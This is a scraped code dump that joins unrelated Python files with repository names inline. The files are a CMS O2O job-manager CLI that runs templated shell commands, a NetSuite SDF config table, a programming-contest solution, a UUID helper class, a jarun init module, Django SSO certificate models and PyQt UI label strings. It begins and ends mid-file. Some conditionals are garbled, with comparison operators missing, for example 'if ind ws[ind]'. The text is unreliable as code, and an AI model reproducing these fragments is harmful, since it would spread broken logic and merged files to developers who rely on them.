primaryjoin="O2OJob.name==O2ORun.job_name") def print_table( headers, table ): ws = [] for h in headers: ws.append(len(h)) for row in table: ind = 0 for c in row: if ind ws[ind]: ws[ind] = len(c) ind += 1 def printf( row ): line = '' ind = 0 for w in ws: fmt = '{:<%s}' %w if ind if username is None: self.logger.error('Credentials for service %s are not available' %db_service) raise Exception("Cannot connect to db %s" %db_service ) url = sqlalchemy_tpl %(username,pwd,db_service) session = None try: self.eng = sqlalchemy.create_engine( url, max_identifier_length=30) session = sqlalchemy.orm.scoped_session( sqlalchemy.orm.sessionmaker(bind=self.eng)) except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return session def readConfiguration( self, config_filename ): config = '' try: with open( config_filename, 'r' ) as config_file: config = config_file.read() if config == '': self.logger.error( 'The file %s contains an empty string.', config_filename ) else: json.loads(config) except IOError as e: self.logger.error( 'The file %s cannot be open.', config_filename ) except ValueError as e: config = '' self.logger.error( 'The file %s contains an invalid json string.', config_filename ) return config def connect( self, service, args ): self.session = self.getSession( service, args.role, args.auth ) self.verbose = args.verbose if self.session is None: return False else: self.db_connection = coral_tpl %(service[0],schema_name) self.conf_dict['db']=self.db_connection return True def runManager( self ): return O2ORunMgr( self.db_connection, self.session, self.logger ) def add( self, job_name, config_filename, int_val, freq_flag, en_flag ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled: self.logger.error( "A job called '%s' exists already.", job_name ) return False configJson = self.readConfiguration( config_filename ) if configJson == '': return False freq_val = 0 if freq_flag: freq_val = 1 job = O2OJob(name=job_name,tag_name='-',enabled=en_flag,frequent=freq_val,interval=int_val) config = O2OJobConf( job_name=job_name, insertion_time = datetime.utcnow(), configuration = configJson ) self.session.add(job) self.session.add(config) self.session.commit() self.logger.info( "New o2o job '%s' created.", job_name ) return True def set( self, job_name, en_flag, fr_val=None ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return if en_flag is not None and enabled != en_flag: job = O2OJob(name=job_name,enabled=en_flag) self.session.merge(job) self.session.commit() action = 'enabled' if not en_flag: action = 'disabled' self.logger.info( "Job '%s' %s." 
%(job_name,action) ) if fr_val is not None: job = O2OJob(name=job_name,frequent=fr_val) self.session.merge(job) self.session.commit() if fr_val==1: self.logger.info( "Job '%s' set 'frequent'" %job_name) else: self.logger.info( "Job '%s' unset 'frequent'" %job_name) def setConfig( self, job_name, config_filename ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return configJson = self.readConfiguration( config_filename ) if configJson == '': return False config = O2OJobConf( job_name=job_name, insertion_time = datetime.utcnow(), configuration = configJson ) self.session.add(config) self.session.commit() self.logger.info( "New configuration inserted for job '%s'", job_name ) def setInterval( self, job_name, int_val ): res = self.session.query(O2OJob.enabled).filter_by(name=job_name) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", job_name ) return job = O2OJob(name=job_name,interval=int_val) self.session.merge(job) self.session.commit() self.logger.info( "The execution interval for job '%s' has been updated.", job_name ) def listJobs( self ): runs = {} res = self.session.query(O2ORun.job_name,sqlalchemy.func.max(O2ORun.start_time)).group_by(O2ORun.job_name).order_by(O2ORun.job_name) for r in res: runs[r[0]] = str(r[1]) res = self.session.query(O2OJob.name, O2OJob.interval, O2OJob.enabled, O2OJob.frequent).order_by(O2OJob.name).all() table = [] for r in res: row = [] row.append(r[0]), row.append('%5d' %r[1] ) frequent = 'Y' if (r[3]==1) else 'N' row.append('%4s' %frequent ) enabled = 'Y' if (r[2]==1) else 'N' row.append('%4s' %enabled ) lastRun = '-' if r[0] in runs.keys(): lastRun = runs[r[0]] row.append( lastRun ) table.append(row) headers = ['Job name','Interval','Frequent','Enabled','Last run start'] print_table( headers, table ) def listConfig( self, jname ): res = self.session.query(O2OJob.enabled).filter_by(name=jname) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", jname ) return res = self.session.query( O2OJobConf.configuration, O2OJobConf.insertion_time ).filter_by(job_name=jname).order_by(O2OJobConf.insertion_time) configs = [] for r in res: configs.append((str(r[0]),r[1])) ind = len(configs) if ind: print("Configurations for job '%s'" %jname) for cf in reversed(configs): print('#%2d since: %s' %(ind,cf[1])) print(cf[0]) ind -= 1 else: self.logger.info("No configuration found for job '%s'" %jname ) def dumpConfig( self, jname, versionIndex, configFile ): versionIndex = int(versionIndex) res = self.session.query(O2OJob.enabled).filter_by(name=jname) enabled = None for r in res: enabled = r if enabled is None: self.logger.error( "A job called '%s' does not exist.", jname ) return res = self.session.query( O2OJobConf.configuration, O2OJobConf.insertion_time ).filter_by(job_name=jname).order_by(O2OJobConf.insertion_time) configs = [] for r in res: configs.append((str(r[0]),r[1])) ind = len(configs) if versionIndex>ind or versionIndex==0: self.logger.error("Configuration for job %s with index %s has not been found." 
%(jname,versionIndex)) return print("Configuration #%2d for job '%s'" %(versionIndex,jname)) config = configs[versionIndex-1] print('#%2d since %s' %(versionIndex,config[1])) print(config[0]) if configFile is None or configFile == '': configFile = '%s_%s.json' %(jname,versionIndex) with open(configFile,'w') as json_file: json_file.write(config[0]) class O2ORunMgr(object): def __init__( self, db_connection, session, logger ): self.job_name = None self.start = None self.end = None self.conf_dict = {} self.conf_dict['db'] = db_connection self.session = session self.logger = logger def startJob( self, job_name ): self.logger.info('Checking job %s', job_name) exists = None enabled = None try: res = self.session.query(O2OJob.enabled,O2OJob.tag_name).filter_by(name=job_name) for r in res: exists = True enabled = int(r[0]) self.tag_name = str(r[1]) if exists is None: self.logger.error( 'The job %s is unknown.', job_name ) return 2 if enabled: res = self.session.query(O2OJobConf.configuration).filter_by(job_name=job_name).order_by(sqlalchemy.desc(O2OJobConf.insertion_time)).first() conf = None for r in res: conf = str(r) if conf is None: self.logger.warning("No configuration found for job '%s'" %job_name ) else: try: self.conf_dict.update( json.loads(conf) ) self.logger.info('Using configuration: %s ' %conf) except Exception as e: self.logger.error( str(e) ) return 6 self.job_name = job_name self.start = datetime.utcnow() run = O2ORun(job_name=self.job_name,start_time=self.start,status_code=startStatus) self.session.add(run) self.session.commit() return 0 else: self.logger.info( 'The job %s has been disabled.', job_name ) return 5 except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return 7 return -1 def endJob( self, status, log ): self.end = datetime.utcnow() try: run = O2ORun(job_name=self.job_name,start_time=self.start,end_time=self.end,status_code=status,log=log) self.session.merge(run) self.session.commit() self.logger.info( 'Job %s ended.', self.job_name ) return 0 except sqlalchemy.exc.SQLAlchemyError as dberror: self.logger.error( str(dberror) ) return 8 def executeJob( self, args ): job_name = args.name command = args.executable logFolder = os.getcwd() if logFolderEnvVar in os.environ: logFolder = os.environ[logFolderEnvVar] datelabel = datetime.utcnow().strftime("%y-%m-%d-%H-%M-%S") logFileName = '%s-%s.log' %(job_name,datelabel) logFile = os.path.join(logFolder,logFileName) started = self.startJob( job_name ) if started !=0: return started ret = -1 try: # replacing %([key])s placeholders... command = command %(self.conf_dict) #replacing {[key]} placeholders command = command.format(**self.conf_dict ) except KeyError as exc: self.logger.error( "Unresolved template key %s in the command." %str(exc) ) return 3 self.logger.info('Command: "%s"', command ) try: self.logger.info('Executing command...' ) pipe = subprocess.Popen( command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) out = '' for line in iter(pipe.stdout.readline, ''): if args.verbose>=1: sys.stdout.write(line) sys.stdout.flush() out += line pipe.communicate() self.logger.info( 'Command returned code: %s' %pipe.returncode ) ret = pipe.returncode except Exception as e: self.logger.error( str(e) ) return 4 ended = self.endJob( pipe.returncode, out ) if ended != 0: ret = ended with open(logFile,'a') as logF: logF.write(out) return ret import optparse import argparse class O2OTool(): def execute(self): parser = argparse.ArgumentParser(description='CMS o2o command-line tool. 
For general help (manual page), use the help subcommand.') parser.add_argument('--db', type=str, help='The target database: pro ( for prod ) or dev ( for prep ). default=pro') parser.add_argument("--auth","-a", type=str, help="The path of the authentication file") parser.add_argument('--verbose', '-v', action='count', help='The verbosity level') parser_subparsers = parser.add_subparsers(title='Available subcommands') parser_create = parser_subparsers.add_parser('create', description='Create a new O2O job') parser_create.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_create.add_argument('--configFile', '-c', type=str, help='the JSON configuration file path',required=True) parser_create.add_argument('--interval', '-i', type=int, help='the chron job interval',default=0) parser_create.add_argument('--frequent', '-f',action='store_true',help='set the "frequent" flag for this job') parser_create.set_defaults(func=self.create,role=auth.admin_role) parser_setConfig = parser_subparsers.add_parser('setConfig', description='Set a new configuration for the specified job. The configuration is expected as a list of entries "param": "value" (dictionary). The "param" labels will be used to inject the values in the command to execute. The dictionary is stored in JSON format.') parser_setConfig.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setConfig.add_argument('--configFile', '-c', type=str, help='the JSON configuration file path',required=True) parser_setConfig.set_defaults(func=self.setConfig,role=auth.admin_role) parser_setFrequent = parser_subparsers.add_parser('setFrequent',description='Set the "frequent" flag for the specified job') parser_setFrequent.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setFrequent.add_argument('--flag', '-f', choices=['0','1'], help='the flag value to set',required=True) parser_setFrequent.set_defaults(func=self.setFrequent,role=auth.admin_role) parser_setInterval = parser_subparsers.add_parser('setInterval',description='Set a new execution interval for the specified job') parser_setInterval.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_setInterval.add_argument('--interval', '-i', type=int, help='the chron job interval',required=True) parser_setInterval.set_defaults(func=self.setInterval,role=auth.admin_role) parser_enable = parser_subparsers.add_parser('enable',description='enable the O2O job') parser_enable.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_enable.set_defaults(func=self.enable,role=auth.admin_role) parser_disable = parser_subparsers.add_parser('disable',description='disable the O2O job') parser_disable.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_disable.set_defaults(func=self.disable,role=auth.admin_role) parser_listJobs = parser_subparsers.add_parser('listJobs', description='list the registered jobs') parser_listJobs.set_defaults(func=self.listJobs,role=auth.reader_role) parser_listConf = parser_subparsers.add_parser('listConfig', description='shows the configurations for the specified job') parser_listConf.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_listConf.add_argument('--dump', type=int, help='Dump the specified config.',default=0) parser_listConf.set_defaults(func=self.listConf,role=auth.reader_role) parser_dumpConf = parser_subparsers.add_parser('dumpConfig', description='dumps a 
specific job configuration version') parser_dumpConf.add_argument('versionIndex', type=str,help='the version to dump') parser_dumpConf.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_dumpConf.add_argument('--configFile', '-c', type=str, help='the JSON configuration file name - default:[jobname]_[version].json') parser_dumpConf.set_defaults(func=self.dumpConf,role=auth.reader_role) parser_run = parser_subparsers.add_parser('run', description='Wrapper for O2O jobs execution. Supports input parameter injection from the configuration file associated to the job. The formatting syntax supported are the python ones: "command -paramName {paramLabel}" or "command -paramName %(paramLabel)s". where [paramName] is the name of the parameter required for the command, and [paramLabel] is the key of the parameter entry in the config dictionary (recommended to be equal for clarity!"') parser_run.add_argument('executable', type=str,help='command to execute') parser_run.add_argument('--name', '-n', type=str, help='The o2o job name',required=True) parser_run.set_defaults(func=self.run,role=auth.writer_role) args = parser.parse_args() if args.verbose is not None and args.verbose >=1: self.setup(args) return args.func() else: try: self.setup(args) sys.exit( args.func()) except Exception as e: logging.error(e) sys.exit(1) def setup(self, args): self.args = args db_service = prod_db_service if args.db is not None: if args.db == 'dev' or args.db == 'oradev' : db_service = dev_db_service elif args.db != 'orapro' and args.db != 'onlineorapro' and args.db != 'pro': raise Exception("Database '%s' is not known." %args.db ) logLevel = logging.DEBUG if args.verbose is not None and args.verbose >= 1 else logging.INFO self.mgr = O2OJobMgr( logLevel ) return self.mgr.connect( db_service, args ) def create(self): self.mgr.add( self.args.name, self.args.configFile, self.args.interval, True ) def setConfig(self): self.mgr.setConfig( self.args.name, self.args.configFile ) def setInterval(self): self.mgr.setInterval( self.args.name, self.args.interval ) def enable(self): self.mgr.set( self.args.name, True ) def disable(self): self.mgr.set( self.args.name, False ) def setFrequent(self): self.mgr.set( self.args.name, None, int(self.args.flag) ) def listJobs(self): self.mgr.listJobs() def listConf(self): self.mgr.listConfig( self.args.name ) def dumpConf(self): self.mgr.dumpConfig( self.args.name, self.args.versionIndex, self.args.configFile ) def run(self): rmgr = self.mgr.runManager() return rmgr.executeJob( self.args ) class Config(): config_object = { "cli_arguments": { "adddependencies": "-p \"[PROJECT_FOLDER]\" -all", "deploy": "-np -p \"[PROJECT_FOLDER]\"", "importbundle": "-p \"[PROJECT_FOLDER]\"", "importconfiguration": "-p \"[PROJECT_FOLDER]\"", # FEATURES:ALL_FEATURES", "importfiles": "-p \"[PROJECT_FOLDER]\" -excludeproperties", "importobjects": "-p \"[PROJECT_FOLDER]\"", "listbundles": "", "listconfiguration": "", "listfiles": "-folder \"/SuiteScripts\"", "listmissingdependencies": "-p \"[PROJECT_FOLDER]\"", "listobjects": "-p \"[PROJECT_FOLDER]\"", "preview": "-p \"[PROJECT_FOLDER]\"", "update": "-p \"[PROJECT_FOLDER]\"", "updatecustomrecordwithinstances": "-p \"[PROJECT_FOLDER]\"", # "uploadfiles": "-p \"[PROJECT_FOLDER]\"", # "uploadfolders": "-p \"[PROJECT_FOLDER]\"", "validate": "-p \"[PROJECT_FOLDER]\" -server", "issuetoken": "", "savetoken": "", "revoketoken": "" }, "custom_objects": [ [ "Bundle Installation Script", "bundleinstallationscript", 
"/Objects/Scripts/BundleInstallation", "customscript" ], [ "Centers", "center", "/Objects/CentersAndTabs/Center", "custcenter" ], [ "Center Categories", "centercategory", "/Objects/CentersAndTabs/Category", "custcentercategory" ], [ "Center Tabs", "centertab", "/Objects/CentersAndTabs/Tab", "custcentertab" ], [ "Client Scripts", "clientscript", "/Objects/Scripts/Client", "customscript" ], [ "CRM Custom Fields", "crmcustomfield", "/Objects/Fields/CRM", "custevent" ], [ "Custom Plugins", "customglplugin", "/Objects/Plugins/Custom", "customscript" ], [ "Custom Lists", "customlist", "/Objects/Lists", "customlist" ], [ "Custom Records", "customrecordtype", "/Objects/Records", "customrecord" ], [ "Email Capture Plugins", "emailcaptureplugin", "/Objects/Plugins/Email", "customscript" ], [ "Entity Custom Fields", "entitycustomfield", "/Objects/Fields/Entity", "custentity" ], [ "Entity Forms", "entryForm", "/Objects/Forms/Entry", "custform" ], [ "Transaction Forms", "transactionForm", "/Objects/Forms/Transaction", "custform" ], [ "Item Custom Fields", "itemcustomfield", "/Objects/Fields/Item", "custitem" ], [ "Item Number Custom Fields", "itemnumbercustomfield", "/Objects/Fields/ItemNumber", "custitem" ], [ "Item Option Custom Fields", "itemoptioncustomfield", "/Objects/Fields/ItemOption", "custitemoption" ], [ "Map Reduce Script", "mapreducescript", "/Objects/Scripts/MapReduce", "customscript" ], [ "Mass Update Script", "massupdatescript", "/Objects/Scripts/MassUpdate", "customscript" ], [ "Other Custom Field", "othercustomfield", "/Objects/Fields/Other", "custrecord" ], [ "Portlets", "portlet", "/Objects/Scripts/Portlet", "customscript" ], [ "Promotions Plugins", "promotionsplugin", "/Objects/Plugins/Promotions", "customscript" ], [ "Restlets", "restlet", "/Objects/Scripts/Restlet", "customscript" ], [ "Roles", "role", "/Objects/Roles", "customrole" ], [ "Saved Searches", "savedsearch", "/Objects/SavedSearches", "customsearch" ], [ "Scheduled Scripts", "scheduledscript", "/Objects/Scripts/Scheduled", "customscript" ], [ "Sub Tabs", "subtab", "/Objects/CentersAndTabs/SubTab", "custtab" ], [ "Suitelet", "suitelet", "/Objects/Scripts/Suitelet", "customscript" ], [ "Transaction Body Custom Field", "transactionbodycustomfield", "/Objects/Fields/TransactionBody", "transactionbodycustomfield" ], [ "Transaction Column Custom Field", "transactioncolumncustomfield", "/Objects/Fields/TransactionColumn", "custcol" ], [ "User Event Script", "usereventscript", "/Objects/Scripts/UserEvent", "customscript" ], [ "Workflows", "workflow", "/Objects/Workflows", "customworkflow" ], [ "Workflow Action Scripts", "workflowactionscript", "/Objects/Scripts/WorkflowAction", "customscript" ] ], "cli_commands": [ [ "Add Dependencies to Manifest", "Adds missing dependencies to the manifest file.", "adddependencies" ], [ "Deploy to Account", "Deploys the folder or zip file that contains the SuiteCloud project.", "deploy" ], [ "Import Bundle", "Imports a customization bundle from your NetSuite account and\nconverts it to an account customization project.", "importbundle" ], [ "Import Configuration", "Imports the feature configuration from your NetSuite account to the account customization project so that you can enable or disable features in the project.", "importconfiguration" ], [ "Import Files", "Imports files from your NetSuite account to the account customization project.", "importfiles" ], [ "Import Objects", "Imports custom objects from your NetSuite account to the SuiteCloud project.", "importobjects" ], [ "List 
Bundles", "Lists the customization bundles that were created in your NetSuite account.", "listbundles" ], [ "List Configuration", "List available account configuration.", "listconfiguration" ], [ "List Files", "Lists the files in the File Cabinet of your NetSuite account.", "listfiles" ], [ "List Missing Dependencies", "Lists the missing dependencies in the SuiteCloud project.", "listmissingdependencies" ], [ "List Objects", "Lists the custom objects in your NetSuite account.", "listobjects" ], [ "Preview", "Previews the deployment steps of a folder or zip file that contains the SuiteCloud project.", "preview" ], [ "Update", "Updates existing custom objects in the SuiteCloud project folder with the custom objects in your NetSuite account.", "update" ], [ "Update Custom Record With Instances", "Updates the custom record object and its instances in the SuiteCloud project.", "updatecustomrecordwithinstances" ], # [ # "Upload File to Account", # "Either the current file if in a SuiteScript folder, or show you a list of files to upload.", # "uploadfiles" # ], # [ # "Upload Folder to Account", # "Select an entire folder to upload", # "uploadfolders" # ], [ "Validate Project", "Validates the folder or zip file that contains the SuiteCloud project.", "validate" ], [ "Issue Token", "Issues a TBA token to authenticate against your NetSuite Production account.", "issuetoken" ], [ "Save Token", "Saves the latest TBA token created from your NetSuite account to use with SDF CLI.", "savetoken" ], [ "Revoke Token", "Revokes the latest TBA token that was issued to your NetSuite Production account using the issuetoken command.", "revoketoken" ], [ "Set Password", "Sets the password for this environment and session", "setpassword" ], [ "Clear Password", "Clears the password for this environment from this session", "clearpassword" ] ] } def get( index_key ): return Config.config_object[ index_key ]terror/Solutions from math import pi def main(): d = {v: i for i, v in enumerate([i for i in range(65, 91)] + [32, 39])} for _ in range(int(input())): i, ans = list(input()), 0 start = d[ord(i[0])] for ch in i[1:]: nxt = d[ord(ch)] ans += min(abs(start - nxt), 28 - (abs(start - nxt))) * pi / 7 start = nxt print(ans + (len(i))) if __name__ == "__main__": main() src/Uid/Uid.py from uuid import uuid1 def uid(): """ @see: https://docs.python.org/3.8/library/uuid.html?highlight=uuid#module-uuid """ return str(uuid1()) class Uid(object): """Defines and set a unique id as property """ @property def id(self): """`id` property, read-only""" return self.__id def __init__(self, *args, **kwargs): self.__id = uid() super(Uid, self).__init__(*args, **kwargs) def __eq__(self, other): """Implements the `==` operator""" return self.id == other.id # `!=` is implicit def __hash__(self): """Implements the `hash` built-in function""" return hash(self.id) if __name__ == '__main__': a = Uid() b = Uid() c = Uid() assert isinstance(a, Uid) # Force `c` to have the same id as `a` c._Uid__id = a.id assert a != b assert a == c nishemon/jarun # -*- coding: utf-8 -*- import shutil import os import App import Conf import Consts import util import sub_install def _init_sys(conf, syspod): sysbuilder = syspod.new_context_builder([':'.join(Consts.SYS_JARS[0])]) try: for j in Consts.SYS_JARS: pv = util.download_package(Consts.INIT_REPOSITORY_URLS, j[0], j[1], sysbuilder.get_working(), j[2] if 2 < len(j) else None) if pv: sysbuilder.add_direct(':'.join(j[0:2]), pv[0], pv[1]) sysjava = util.new_sys_java(conf, sysbuilder.get_working()) code, output = 
sysjava.sys_run(['Health'], conf.to_dict()) if code != 0: raise Exception("Fail to execute marun java library.\n" + str(output)) except: sysbuilder.revert() raise return sysbuilder.commit(None, None) def init(conf, force=False): javas = util.find_javas() if len(javas) == 0: return False, "Command \"java\" is not found. Set JAVA_HOME/PATH/MARUN_JAVA or config file." rootdir = conf.workdir if force: shutil.rmtree(rootdir, True) util.mkdirs(rootdir) syspod = App.AppPod(conf, rootdir) sysctx = syspod.get_current_context() if not sysctx: sysctx = _init_sys(conf, syspod) if [x for x in conf.repository_list if x.baseurl and x.baseurl.startswith('s3:')]: artifacts = sysctx.get_installs() if not Consts.S3_ADDONS <= artifacts: artifacts = artifacts | Consts.S3_ADDONS backup = conf.repository_list conf.repository_list = map(Conf.StaticRepository, Consts.INIT_REPOSITORY_URLS) sub_install.install_to_pod(conf, syspod, artifacts) conf.repository_list = backup return True, None def _init(conf, args): return init(conf, args.force) def setup_subcmd(subparsers): init_parser = subparsers.add_parser('init', help='Initialize') init_parser.add_argument('-f', '--force', help='remove all', action='store_true') init_parser.set_defaults(handler=_init, init=True) corehq/apps/sso/models.py0 from django.db import models from corehq.apps.accounting.models import BillingAccount from corehq.apps.sso import certificates from corehq.apps.sso.exceptions import ServiceProviderCertificateError class IdentityProviderType: AZURE_AD = 'azure_ad' CHOICES = ( (AZURE_AD, "Azure AD"), ) class ServiceProviderCertificate: def __init__(self): """ To increase the security with SAML transactions, we will provide the IdP with our public key for an x509 certificate unique to our interactions with a particular IdP. This certificate will be regenerated automatically by a periodic task every year. """ key_pair = certificates.create_key_pair() cert = certificates.create_self_signed_cert(key_pair) self.public_key = certificates.get_public_key(cert) self.private_key = certificates.get_private_key(key_pair) self.date_expires = certificates.get_expiration_date(cert) class IdentityProvider(models.Model): """ This stores the information necessary to make a SAML request to an external IdP. Right now this process supports Azure AD and the plan is to add support for other identity provider types in the future. """ # these three fields must only ever be editable by Accounting admins name = models.CharField(max_length=128) slug = models.CharField(max_length=256, db_index=True, unique=True) idp_type = models.CharField( max_length=50, default=IdentityProviderType.AZURE_AD, choices=IdentityProviderType.CHOICES, ) # whether an IdP is editable by its BillingAccount owner # (it will always be editable by accounting admins) is_editable = models.BooleanField(default=False) # whether an IdP is actively in use as an authentication method on HQ is_active = models.BooleanField(default=False) # the enterprise admins of this account will be able to edit the SAML # configuration fields owner = models.ForeignKey(BillingAccount, on_delete=models.PROTECT) # these are fields required by the external IdP to form a SAML request entity_id = models.TextField(blank=True, null=True) login_url = models.TextField(blank=True, null=True) logout_url = models.TextField(blank=True, null=True) idp_cert_public = models.TextField(blank=True, null=True) # the date the IdP's SAML signing certificate expires. 
# this will be filled out by enterprise admins date_idp_cert_expiration = models.DateTimeField(blank=True, null=True) # as the service provider, this will store our x509 certificates and # will be renewed automatically by a periodic task sp_cert_public = models.TextField(blank=True, null=True) sp_cert_private = models.TextField(blank=True, null=True) date_sp_cert_expiration = models.DateTimeField(blank=True, null=True) # as the x509 certificate expires, we need to provide the IdP with our next # "rollover" cert to prepare the IdP for the transfer sp_rollover_cert_public = models.TextField(blank=True, null=True) sp_rollover_cert_private = models.TextField(blank=True, null=True) date_sp_rollover_cert_expiration = models.DateTimeField(blank=True, null=True) # for auditing purposes created_on = models.DateTimeField(auto_now_add=True) created_by = models.EmailField() last_modified = models.DateTimeField(auto_now=True) last_modified_by = models.EmailField() class Meta: app_label = 'sso' def __str__(self): return f"{self.name} IdP [{self.idp_type}]" def create_service_provider_certificate(self): sp_cert = ServiceProviderCertificate() self.sp_cert_public = sp_cert.public_key self.sp_cert_private = sp_cert.private_key self.date_sp_cert_expiration = sp_cert.date_expires self.save() def create_rollover_service_provider_certificate(self): sp_cert = ServiceProviderCertificate() self.sp_rollover_cert_public = sp_cert.public_key self.sp_rollover_cert_private = sp_cert.private_key self.date_sp_rollover_cert_expiration = sp_cert.date_expires self.save() def renew_service_provider_certificate(self): if not self.sp_rollover_cert_public: raise ServiceProviderCertificateError( "A rollover certificate for the Service Provider was never " "generated. You should first create a rollover certificate and " "leave it active for a few days to give the IdP a heads up." ) self.sp_cert_public = self.sp_rollover_cert_public self.sp_cert_private = self.sp_rollover_cert_private self.date_sp_cert_expiration = self.date_sp_rollover_cert_expiration self.sp_rollover_cert_public = None self.sp_rollover_cert_private = None self.date_sp_rollover_cert_expiration = None self.save() class AuthenticatedEmailDomain(models.Model): """ This specifies the email domains that are tied to an Identity Provider and a list of users that would be exempt from SSO. """ email_domain = models.CharField(max_length=256, db_index=True, unique=True) identity_provider = models.ForeignKey(IdentityProvider, on_delete=models.PROTECT) class Meta: app_label = 'sso' def __str__(self): return f"{self.email_domain} authenticated by [{self.identity_provider.name}]" class UserExemptFromSingleSignOn(models.Model): """ This specifies what users are exempt from SSO for a given AuthenticatedEmailDomain. Other users will be required to use SSO once an AuthenticatedEmailDomain is specified for their email domain. 
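    For example (illustrative only), if ``example.com`` is registered as an
    AuthenticatedEmailDomain for some IdentityProvider, adding the username
    ``admin@example.com`` here keeps that single account exempt from SSO while
    every other ``example.com`` user must authenticate through the IdP.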
""" username = models.CharField(max_length=128, db_index=True) email_domain = models.ForeignKey(AuthenticatedEmailDomain, on_delete=models.CASCADE) class Meta: app_label = 'sso' def __str__(self): return f"{self.username} is exempt from SSO with {self.email_domain}" class TrustedIdentityProvider(models.Model): """ This specifies the trust between domains (who are not associated with the IdP's BillingAccount owner) and an IdentityProvider """ domain = models.CharField(max_length=256, db_index=True) identity_provider = models.ForeignKey(IdentityProvider, on_delete=models.PROTECT) date_acknowledged = models.DateTimeField(auto_now_add=True) acknowledged_by = models.EmailField() class Meta: app_label = 'sso' def __str__(self): return f"{self.domain} trusts [{self.identity_provider.name}]" michaelcolman/Sub_cellular_heterogeneity_TOOLKIT from PyQt5 import QtCore, QtGui, QtWidgets from lib.Themes import app_dark_mode from matplotlib.figure import Figure from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as Toolbar from matplotlib.widgets import RectangleSelector def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "HetKit")) self.labelTitle.setText(_translate("MainWindow", "Sub-Cellular Heterogeneity Toolkit")) self.labelDoc1.setText(_translate("MainWindow", "Find the documentation at:")) self.labelMaxx.setText(_translate("MainWindow", "Developed by the Leeds Computational Physiology Lab")) self.labelDoc2.setText(_translate("MainWindow", "https://github.com/michaelcolman/Sub_cellular_heterogeneity_TOOLKIT")) self.labelEmail.setText(_translate("MainWindow", "Contact us at ")) # self.labelLogo.setText(_translate("MainWindow", "
")) self.labelID.setText(_translate("MainWindow", "Analysis ID:")) self.entryID.setPlaceholderText(_translate("MainWindow", "Type an existing ID & load data, or create a new one!")) self.buttonLoad.setText(_translate("MainWindow", "Load Data")) self.labelData.setText(_translate("MainWindow", "Data Path:")) self.labelPath.setText(_translate("MainWindow", "Load an analysis or browse to select data")) self.buttonBrowse.setText(_translate("MainWindow", "Browse")) self.buttonHelp1.setText(_translate("MainWindow", "Help")) self.buttonContinue.setText(_translate("MainWindow", "Continue")) self.buttonCreateSRF.setText(_translate("MainWindow", "Create SRF")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabID), _translate("MainWindow", "ID && Load Data")) self.labelRGB.setText(_translate("MainWindow", "RGB Channel Selection")) self.rbRed.setText(_translate("MainWindow", "Red")) self.rbGreen.setText(_translate("MainWindow", "Green")) self.rbBlue.setText(_translate("MainWindow", "Blue")) self.rbAll.setText(_translate("MainWindow", "None")) self.labelCropTitle.setText(_translate("MainWindow", "Cropping")) self.labelCrop.setText(_translate("MainWindow", "Draw a region on the plot to set a crop")) self.labelCoords.setText(_translate("MainWindow", "Co-ordinates: (X1, Y1), (X2, Y2)")) self.labelDS.setText(_translate("MainWindow", "Downsampling")) self.entryX1.setPlaceholderText(_translate("MainWindow", "0.09")) self.entryY1.setPlaceholderText(_translate("MainWindow", "0.09")) self.entryX2.setPlaceholderText(_translate("MainWindow", "1.0")) self.entryY2.setPlaceholderText(_translate("MainWindow", "1.0")) self.labelDSImage.setText(_translate("MainWindow", "Image (μm)")) self.labelDSNew.setText(_translate("MainWindow", "New Scale (μm)")) self.labelDSX1.setText(_translate("MainWindow", "X-Axis")) self.labelDSX2.setText(_translate("MainWindow", "X-Axis")) self.labelDSY2.setText(_translate("MainWindow", "Y-Axis")) self.labelDSY1.setText(_translate("MainWindow", "Y-Axis")) self.labelRotate.setText(_translate("MainWindow", "Image Rotation")) self.labelDegrees.setText(_translate("MainWindow", "Degrees Clockwise:")) self.buttonRotate.setText(_translate("MainWindow", "Rotate")) self.buttonHelp2.setText(_translate("MainWindow", "Help")) self.buttonReset.setText(_translate("MainWindow", "Reset")) self.buttonApply.setText(_translate("MainWindow", "Apply")) self.labelStack.setText(_translate("MainWindow", "Current Image in Stack: 1")) self.buttonContinue2.setText(_translate("MainWindow", "Continue")) self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabConfig), _translate("MainWindow", "Configuration")) self.labelAnalTitle.setText(_translate("MainWindow", "Analysis Settings")) self.labelBinCount.setText(_translate("MainWindow", "Bin Count Range:")) self.labelBinSize.setText(_translate("MainWindow", "Bin Size Range:")) self.labelBCTo.setText(_translate("MainWindow", "to")) self.labelBCto2.setText(_translate("MainWindow", "to")) self.labelOutSettings.setText(_translate("MainWindow", "Output Settings")) self.checkOPDefault.setText(_translate("MainWindow", "All (Default)")) self.checkOPRotate.setText(_translate("MainWindow", "Rotated")) self.checkOPCropped.setText(_translate("MainWindow", "Cropped")) self.checkOPDownsample.setText(_translate("MainWindow", "Downsampled")) self.checkOPVario.setText(_translate("MainWindow", "Variograms")) self.checkOPHist.setText(_translate("MainWindow", "Histograms")) self.buttonHelp3.setText(_translate("MainWindow", "Help")) self.buttonStartVario.setText(_translate("MainWindow", 
